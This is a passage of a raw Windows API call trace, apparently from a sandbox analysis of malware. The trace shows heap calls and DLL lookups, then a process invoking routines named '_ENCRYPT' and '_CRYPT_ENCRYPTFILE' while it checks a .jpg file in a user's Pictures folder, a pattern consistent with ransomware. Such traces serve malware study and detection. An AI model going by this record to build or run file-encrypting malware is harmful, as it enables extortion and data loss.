hHeap=0x8a0000) returned 1 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.836] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.837] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0190.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd960, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0190.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.837] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0190.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0190.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.838] CloseHandle (hObject=0x160) returned 1 [0190.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.838] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0190.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.839] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.839] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.839] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0190.839] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.839] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0190.839] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0190.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.840] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.840] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.840] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.840] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60b46d40, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0x8e2aef50, ftLastAccessTime.dwHighDateTime=0x1d5e38d, ftLastWriteTime.dwLowDateTime=0x8e2aef50, ftLastWriteTime.dwHighDateTime=0x1d5e38d, nFileSizeHigh=0x0, nFileSizeLow=0x2cc4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="tiM2iA.jpg", cAlternateFileName="")) returned 0x90add8 [0190.840] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.840] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.840] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60b46d40, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0x8e2aef50, ftLastAccessTime.dwHighDateTime=0x1d5e38d, ftLastWriteTime.dwLowDateTime=0x8e2aef50, ftLastWriteTime.dwHighDateTime=0x1d5e38d, nFileSizeHigh=0x0, nFileSizeLow=0x2cc4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="tiM2iA.jpg", cAlternateFileName="")) returned 0x90add8 [0190.841] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.841] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tiM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iM2iA.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.843] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.843] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0190.843] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.843] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.844] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.844] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.844] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.844] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.844] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60b46d40, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0x8e2aef50, ftLastAccessTime.dwHighDateTime=0x1d5e38d, ftLastWriteTime.dwLowDateTime=0x8e2aef50, ftLastWriteTime.dwHighDateTime=0x1d5e38d, nFileSizeHigh=0x0, nFileSizeLow=0x2cc4, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="tiM2iA.jpg", cAlternateFileName="")) returned 0x90ae18 [0190.844] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 